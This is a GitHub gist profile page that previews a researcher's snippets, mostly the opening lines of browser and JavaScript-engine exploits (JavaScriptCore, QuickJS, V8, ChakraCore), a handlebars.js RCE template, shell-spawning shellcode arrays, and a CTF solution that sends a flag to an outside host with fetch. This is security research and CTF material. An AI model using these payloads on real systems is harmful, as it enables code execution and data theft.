Skip to content

Instantly share code, notes, and snippets.

View itszn's full-sized avatar

Amy itszn

249 followers · 10 following
View GitHub Profile
@itszn
itszn / google_fonts.json
Created June 1, 2024 21:40
I had claude-3-opus look at every google font and give a description
This file has been truncated, but you can view the full file.
[
{
"name": "ABeeZee",
"desc": "Clean, modern, rounded, neutral sans-serif font. Geometric and minimalist letterforms with wide apertures and consistent stroke widths. Tags: web design, mobile apps, user interface, modern, minimal, friendly, approachable, tech, startup, blog",
"metadata": {
"family": "ABeeZee",
"displayName": null,
"category": "Sans Serif",
"stroke": "Sans Serif",
"classifications": [],
@itszn
itszn / exploit.js
Created July 11, 2018 16:27
Exploit for JavascriptCore CVE-2018-4192
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
@itszn
itszn / quickjs.js
Created July 20, 2020 20:43
quickjs explot
/*
* This exploit is targeting linux, tested on ubuntu 18.04
* Techniques should generally work on other OSs but I don't have any to test easily
*/
// Debugging functions
if (this.debug === undefined)
this.debug = ()=>{}
if (this.cc === undefined)
this.cc = ()=>{}
@itszn
itszn / 0day.handlebars
Created September 16, 2019 00:59
handlebars.js rce 0day
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
@itszn
itszn / subleq.py
Created October 16, 2017 04:24
Binary Ninja subleq plugin
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
BranchType,
LowLevelILOperation, LLIL_TEMP,
LowLevelILLabel,
FlagRole,
LowLevelILFlagCondition,
log_error,
CallingConvention,
interaction,
@itszn
itszn / exploit.html
Last active April 9, 2021 18:31
34c3ctf V9 Exploit
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
@itszn
itszn / exploit.js
Last active April 9, 2021 18:29
Trendmicro CTF ChakraCore exploit
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
@itszn
itszn / d8.js
Last active March 5, 2021 16:31
Plaid CTF 2018 d8 exploit
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
@itszn
itszn / challengeresult.lua
Last active February 13, 2021 22:15
LiqidWave-1.4.1 Challenges
-- TODO: move util functions to common.lua
local charts = {}
local passed = false
local desw = 770
local desh = 800
local moveX = 0
local moveY = 0
@itszn
itszn / solve1.html
Last active November 8, 2019 17:41
Easiest Crackme Solution
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 1) {
fetch("http://itszn.com/?flag="+msg.output);